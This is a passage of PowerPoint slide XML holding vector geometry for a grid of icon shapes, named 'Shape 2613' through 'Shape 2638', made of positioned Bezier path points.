                  <a:pt x="16200" y="15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2" name="Shape 2613"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10517648" y="31368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4"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="10800" y="1964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2"/>
                  <a:pt x="5941" y="17046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7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5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7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8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7"/>
                  <a:pt x="16278" y="16972"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16972" y="17666"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16969" y="17668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6"/>
                  <a:pt x="20974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8"/>
                  <a:pt x="16972" y="1627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3" name="Shape 2614"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11050909" y="313683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4" name="Shape 2615"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251560" y="367009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5" name="Shape 2616"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6784821" y="3682787"/>
            <a:ext cx="279328" cy="2539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3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10"/>
                  <a:pt x="6113" y="10507"/>
                  <a:pt x="5698" y="9969"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5646" y="9902"/>
                  <a:pt x="5599" y="9842"/>
                  <a:pt x="5562" y="9786"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5550" y="9769"/>
                  <a:pt x="5538" y="9752"/>
                  <a:pt x="5526" y="9735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2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5249" y="6721"/>
                  <a:pt x="4603" y="5151"/>
                  <a:pt x="5035" y="3988"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5619" y="2411"/>
                  <a:pt x="6140" y="2099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2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4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6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11091" y="9842"/>
                  <a:pt x="11044" y="9902"/>
                  <a:pt x="10992" y="9969"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10578" y="10507"/>
                  <a:pt x="9806" y="11510"/>
                  <a:pt x="9806" y="13567"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9806" y="15972"/>
                  <a:pt x="11535" y="17087"/>
                  <a:pt x="12500" y="17361"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13925" y="17916"/>
                  <a:pt x="15432" y="18665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40"/>
                  <a:pt x="12999" y="4821"/>
                  <a:pt x="12211" y="2789"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11716" y="1514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7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7"/>
                  <a:pt x="12782" y="16326"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="18035" y="15774"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="18035" y="15774"/>
                  <a:pt x="16217" y="15312"/>
                  <a:pt x="16217" y="13291"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16217" y="11515"/>
                  <a:pt x="17087" y="10890"/>
                  <a:pt x="17376" y="10458"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17376" y="10458"/>
                  <a:pt x="17968" y="9906"/>
                  <a:pt x="17572" y="8122"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18232" y="7146"/>
                  <a:pt x="18387" y="5419"/>
                  <a:pt x="17669" y="3590"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17218" y="2442"/>
                  <a:pt x="16666" y="1814"/>
                  <a:pt x="16059" y="1449"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15612" y="1180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4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12878" y="1781"/>
                  <a:pt x="12997" y="2064"/>
                  <a:pt x="13115" y="2366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13131" y="2409"/>
                  <a:pt x="13143" y="2453"/>
                  <a:pt x="13159" y="2496"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13436" y="2360"/>
                  <a:pt x="13994" y="2160"/>
                  <a:pt x="14614" y="2160"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15001" y="2160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9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17366" y="5541"/>
                  <a:pt x="17207" y="6853"/>
                  <a:pt x="16784" y="7478"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16610" y="7736"/>
                  <a:pt x="16549" y="8067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4"/>
                  <a:pt x="16607" y="9786"/>
                  <a:pt x="16584" y="9820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8"/>
                  <a:pt x="15236" y="11419"/>
                  <a:pt x="15236" y="13291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7"/>
                  <a:pt x="20311" y="17926"/>
                  <a:pt x="20570" y="19440"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="17464" y="19440"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17553" y="19773"/>
                  <a:pt x="17615" y="20132"/>
                  <a:pt x="17645" y="20520"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21152" y="20520"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="20520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6" name="Shape 2617"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7318082" y="3695484"/>
            <a:ext cx="279328" cy="228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1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2"/>
                  <a:pt x="8380" y="7241"/>
                  <a:pt x="8380" y="7241"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8112" y="6505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1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5"/>
                  <a:pt x="12890" y="2039"/>
                  <a:pt x="13313" y="3271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2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13386" y="9109"/>
                  <a:pt x="13260" y="9534"/>
                  <a:pt x="13227" y="9619"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13219" y="9631"/>
                  <a:pt x="13101" y="9814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1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1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13957" y="10421"/>
                  <a:pt x="14531" y="9807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5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79"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6540" y="5168"/>
                  <a:pt x="7179" y="6892"/>
                  <a:pt x="7494" y="7758"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7110" y="9740"/>
                  <a:pt x="7642" y="10421"/>
                  <a:pt x="7642" y="10421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6"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="19516" y="15006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5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="19388" y="7760"/>
                  <a:pt x="19900" y="6419"/>
                  <a:pt x="19470" y="5184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18974" y="3714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3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0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5"/>
                  <a:pt x="17332" y="3919"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17375" y="3953"/>
                  <a:pt x="17421" y="3983"/>
                  <a:pt x="17467" y="4008"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17950" y="4265"/>
                  <a:pt x="18131" y="4362"/>
                  <a:pt x="18562" y="5641"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18822" y="6387"/>
                  <a:pt x="18452" y="7378"/>
                  <a:pt x="18253" y="7911"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18161" y="8156"/>
                  <a:pt x="18130" y="8457"/>
                  <a:pt x="18182" y="8718"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18316" y="9392"/>
                  <a:pt x="18254" y="9706"/>
                  <a:pt x="18232" y="9784"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18230" y="9788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3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8"/>
                  <a:pt x="19516" y="15006"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="2371" y="16155"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="3030" y="15933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8"/>
                  <a:pt x="3367" y="9784"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3346" y="9706"/>
                  <a:pt x="3283" y="9392"/>
                  <a:pt x="3418" y="8718"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="3470" y="8457"/>
                  <a:pt x="3439" y="8156"/>
                  <a:pt x="3347" y="7911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2"/>
                  <a:pt x="3649" y="4265"/>
                  <a:pt x="4133" y="4008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5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5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6045" y="3548"/>
                  <a:pt x="6096" y="3341"/>
                  <a:pt x="6165" y="3134"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6225" y="2950"/>
                  <a:pt x="6289" y="2793"/>
                  <a:pt x="6351" y="2630"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6046" y="2468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4"/>
                  <a:pt x="2130" y="5184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1700" y="6419"/>
                  <a:pt x="2212" y="7760"/>
                  <a:pt x="2464" y="8435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6"/>
                  <a:pt x="2084" y="15006"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1191" y="15388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7" name="Shape 2618"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7851343" y="3681242"/>
            <a:ext cx="279301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8" name="Shape 2619"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8384604" y="3670091"/>
            <a:ext cx="279328" cy="27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9" name="Shape 2620"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8917865" y="3682787"/>
            <a:ext cx="279328" cy="254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4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1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1"/>
                  <a:pt x="11291" y="5461"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="12871" y="1481"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14045" y="751"/>
                  <a:pt x="15436" y="979"/>
                  <a:pt x="15979" y="1990"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16343" y="2668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1"/>
                  <a:pt x="12120" y="1947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19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4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8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0"/>
                  <a:pt x="16829" y="1461"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16015" y="-54"/>
                  <a:pt x="14024" y="-456"/>
                  <a:pt x="12380" y="565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5"/>
                  <a:pt x="10937" y="2103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0"/>
                  <a:pt x="10665" y="2098"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10648" y="2103"/>
                  <a:pt x="10636" y="2115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4"/>
                  <a:pt x="4755" y="1461"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4301" y="2310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1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1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0" name="Shape 2621"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9451126" y="372087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5"/>
                  <a:pt x="982" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="982" y="8155"/>
                  <a:pt x="5378" y="1543"/>
                  <a:pt x="10800" y="1543"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16223" y="1543"/>
                  <a:pt x="20618" y="8155"/>
                  <a:pt x="20618" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20618" y="13445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09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09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0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0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3"/>
                  <a:pt x="9327" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9327" y="12078"/>
                  <a:pt x="9987" y="13114"/>
                  <a:pt x="10800" y="13114"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11613" y="13114"/>
                  <a:pt x="12273" y="12078"/>
                  <a:pt x="12273" y="10800"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12273" y="9523"/>
                  <a:pt x="11613" y="8486"/>
                  <a:pt x="10800" y="84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1" name="Shape 2622"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9984387" y="367009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8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2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1"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11048" y="15407"/>
                  <a:pt x="10935" y="14995"/>
                  <a:pt x="10708" y="14646"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10481" y="14298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6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6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6459" y="11198"/>
                  <a:pt x="6309" y="11466"/>
                  <a:pt x="6204" y="11777"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6100" y="12088"/>
                  <a:pt x="6040" y="12433"/>
                  <a:pt x="6026" y="12811"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6944" y="12811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7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5"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9623" y="11627"/>
                  <a:pt x="9752" y="11943"/>
                  <a:pt x="9752" y="12366"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9752" y="12574"/>
                  <a:pt x="9713" y="12759"/>
                  <a:pt x="9634" y="12922"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9554" y="13086"/>
                  <a:pt x="9448" y="13221"/>
                  <a:pt x="9315" y="13329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9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5"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7895" y="14447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7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7"/>
                  <a:pt x="9860" y="15086"/>
                  <a:pt x="9947" y="15275"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10033" y="15464"/>
                  <a:pt x="10076" y="15682"/>
                  <a:pt x="10076" y="15926"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10076" y="16163"/>
                  <a:pt x="10031" y="16377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1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1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499"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14257" y="12499"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="14257" y="12499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2" name="Shape 2623"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10517648" y="367009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5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5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3" name="Shape 2624"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11050909" y="367009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6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6"/>
                  <a:pt x="10800" y="1056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2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0"/>
                  <a:pt x="10889" y="0"/>
                  <a:pt x="10800" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10711" y="0"/>
                  <a:pt x="10632" y="30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2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9"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="25" y="20954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="31" y="20955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1"/>
                  <a:pt x="21600" y="21109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21600" y="21055"/>
                  <a:pt x="21586" y="21005"/>
                  <a:pt x="21569" y="20955"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="21575" y="20954"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="20593" y="18009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4" name="Shape 2625"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6251560" y="422874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4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6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6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5" name="Shape 2626"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810214" y="420335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6"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6916" y="6377"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6904" y="6106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0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4"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="14711" y="18664"/>
                  <a:pt x="14989" y="18452"/>
                  <a:pt x="15001" y="18181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6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4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6" name="Shape 2627"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7362520" y="4203352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2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5"/>
                  <a:pt x="8358" y="1598"/>
                  <a:pt x="8454" y="1688"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8957" y="2167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7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12697" y="1647"/>
                  <a:pt x="13446" y="1473"/>
                  <a:pt x="14760" y="1473"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16059" y="1473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1"/>
                  <a:pt x="10577" y="1461"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10245" y="1461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3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0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6"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="6139" y="6377"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="6125" y="6106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4"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="15494" y="18664"/>
                  <a:pt x="15827" y="18452"/>
                  <a:pt x="15841" y="18181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6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7" name="Shape 2628"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7851343" y="42033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4"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14611" y="20189"/>
                  <a:pt x="14556" y="20170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1"/>
                  <a:pt x="4888" y="1297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5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6"/>
                  <a:pt x="7170" y="7231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9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11541" y="14478"/>
                  <a:pt x="11555" y="14487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40"/>
                  <a:pt x="14301" y="14479"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14320" y="14463"/>
                  <a:pt x="14338" y="14446"/>
                  <a:pt x="14356" y="14427"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15456" y="13320"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15533" y="13271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20"/>
                  <a:pt x="16108" y="13447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4"/>
                  <a:pt x="20379" y="16762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20431" y="16795"/>
                  <a:pt x="20455" y="16816"/>
                  <a:pt x="20466" y="16827"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20520" y="16881"/>
                  <a:pt x="20610" y="16997"/>
                  <a:pt x="20610" y="17174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20610" y="17207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29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3"/>
                  <a:pt x="12104" y="13674"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10500" y="12510"/>
                  <a:pt x="9078" y="11108"/>
                  <a:pt x="7916" y="9502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7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4"/>
                  <a:pt x="9327" y="5891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9327" y="5485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2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3" y="7373"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3436" y="13255"/>
                  <a:pt x="8345" y="18164"/>
                  <a:pt x="14228" y="21117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79"/>
                  <a:pt x="21600" y="17177"/>
                  <a:pt x="21600" y="1717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8" name="Shape 2629"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8384604" y="4203352"/>
            <a:ext cx="27940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6" y="20482"/>
                  <a:pt x="14660" y="20214"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14607" y="20189"/>
                  <a:pt x="14552" y="20170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1"/>
                  <a:pt x="4887" y="1297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5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6"/>
                  <a:pt x="7168" y="7231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9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11538" y="14478"/>
                  <a:pt x="11551" y="14487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0" y="14840"/>
                  <a:pt x="14297" y="14479"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14316" y="14463"/>
                  <a:pt x="14335" y="14446"/>
                  <a:pt x="14352" y="14427"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="15451" y="13320"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="15529" y="13271"/>
                  <a:pt x="15611" y="13247"/>
                  <a:pt x="15697" y="13247"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15874" y="13247"/>
                  <a:pt x="15990" y="13337"/>
                  <a:pt x="16044" y="13391"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16073" y="13420"/>
                  <a:pt x="16103" y="13447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4"/>
                  <a:pt x="20374" y="16762"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20426" y="16795"/>
                  <a:pt x="20449" y="16816"/>
                  <a:pt x="20461" y="16827"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20515" y="16881"/>
                  <a:pt x="20605" y="16997"/>
                  <a:pt x="20605" y="17174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20605" y="17207"/>
                  <a:pt x="20606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6" y="17174"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="21586" y="16768"/>
                  <a:pt x="21421" y="16399"/>
                  <a:pt x="21155" y="16133"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21077" y="16054"/>
                  <a:pt x="20988" y="15988"/>
                  <a:pt x="20893" y="15929"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="16738" y="12697"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="16471" y="12430"/>
                  <a:pt x="16104" y="12265"/>
                  <a:pt x="15697" y="12265"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15364" y="12265"/>
                  <a:pt x="15060" y="12380"/>
                  <a:pt x="14815" y="12567"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="13655" y="13736"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13652" y="13733"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="13473" y="13934"/>
                  <a:pt x="13214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3"/>
                  <a:pt x="12101" y="13674"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10497" y="12510"/>
                  <a:pt x="9076" y="11108"/>
                  <a:pt x="7914" y="9502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7"/>
                  <a:pt x="7659" y="8101"/>
                  <a:pt x="7871" y="7920"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="7870" y="7918"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="9023" y="6773"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="9211" y="6528"/>
                  <a:pt x="9325" y="6224"/>
                  <a:pt x="9325" y="5891"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9325" y="5485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2"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5191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3"/>
                  <a:pt x="183" y="6688"/>
                  <a:pt x="499" y="7356"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="482" y="7373"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="3435" y="13255"/>
                  <a:pt x="8343" y="18164"/>
                  <a:pt x="14224" y="21117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79"/>
                  <a:pt x="21594" y="17177"/>
                  <a:pt x="21594" y="17174"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="21594" y="17174"/>
                  <a:pt x="21586" y="17174"/>
                  <a:pt x="21586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2" y="10309"/>
                  <a:pt x="16692" y="10090"/>
                  <a:pt x="16692" y="9819"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="16692" y="7107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2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0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19" name="Shape 2630"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8981348" y="4203352"/>
            <a:ext cx="1523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0" name="Shape 2631"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9451126" y="422874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69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69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6"/>
                  <a:pt x="2847" y="8400"/>
                  <a:pt x="3436" y="8400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4026" y="8400"/>
                  <a:pt x="4549" y="8076"/>
                  <a:pt x="4909" y="7573"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5269" y="8076"/>
                  <a:pt x="5792" y="8400"/>
                  <a:pt x="6382" y="8400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="6971" y="8400"/>
                  <a:pt x="7495" y="8076"/>
                  <a:pt x="7855" y="7573"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8215" y="8076"/>
                  <a:pt x="8738" y="8400"/>
                  <a:pt x="9327" y="8400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="9917" y="8400"/>
                  <a:pt x="10440" y="8076"/>
                  <a:pt x="10800" y="7573"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="11160" y="8076"/>
                  <a:pt x="11683" y="8400"/>
                  <a:pt x="12273" y="8400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="12862" y="8400"/>
                  <a:pt x="13385" y="8076"/>
                  <a:pt x="13745" y="7573"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14105" y="8076"/>
                  <a:pt x="14629" y="8400"/>
                  <a:pt x="15218" y="8400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15808" y="8400"/>
                  <a:pt x="16331" y="8076"/>
                  <a:pt x="16691" y="7573"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="17051" y="8076"/>
                  <a:pt x="17574" y="8400"/>
                  <a:pt x="18164" y="8400"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18753" y="8400"/>
                  <a:pt x="19276" y="8076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69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69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69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69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69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69"/>
                  <a:pt x="7635" y="13200"/>
                  <a:pt x="7364" y="13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1" name="Shape 2632"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10009781" y="420335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7"/>
                  <a:pt x="6746" y="15709"/>
                  <a:pt x="10800" y="15709"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14856" y="15709"/>
                  <a:pt x="18345" y="14966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39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39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6"/>
                  <a:pt x="11462" y="2945"/>
                  <a:pt x="10800" y="2945"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="10138" y="2945"/>
                  <a:pt x="9600" y="2506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2" name="Shape 2633"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10517648" y="42033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23" name="Shape 2634"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11050909" y="420335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4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800" y="3145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="11480" y="2491"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="12493" y="1518"/>
                  <a:pt x="13820" y="982"/>
                  <a:pt x="15218" y="982"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18196" y="982"/>
                  <a:pt x="20618" y="3404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4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456842"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition advClick="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Shape 2637"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="944342" y="1269857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3" y="14727"/>
                  <a:pt x="10800" y="14727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7817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7" y="982"/>
                  <a:pt x="10800" y="982"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13783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8"/>
                  <a:pt x="21197" y="9818"/>
                  <a:pt x="20700" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="20203" y="9818"/>
                  <a:pt x="19800" y="10038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1" y="16691"/>
                  <a:pt x="10800" y="16691"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5829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8"/>
                  <a:pt x="1397" y="9818"/>
                  <a:pt x="900" y="9818"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="403" y="9818"/>
                  <a:pt x="0" y="10038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8"/>
                  <a:pt x="9900" y="17648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8"/>
                  <a:pt x="2700" y="21110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="2700" y="21381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1"/>
                  <a:pt x="18900" y="21110"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="18900" y="20838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8"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="17243" y="17398"/>
                  <a:pt x="21600" y="14870"/>
                  <a:pt x="216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38" name="Shape 2638"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1414119" y="1269856"/>
            <a:ext cx="279232" cy="2794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0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15110" y="600"/>
                  <a:pt x="17544" y="600"/>
                  <a:pt x="19045" y="2100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2"/>
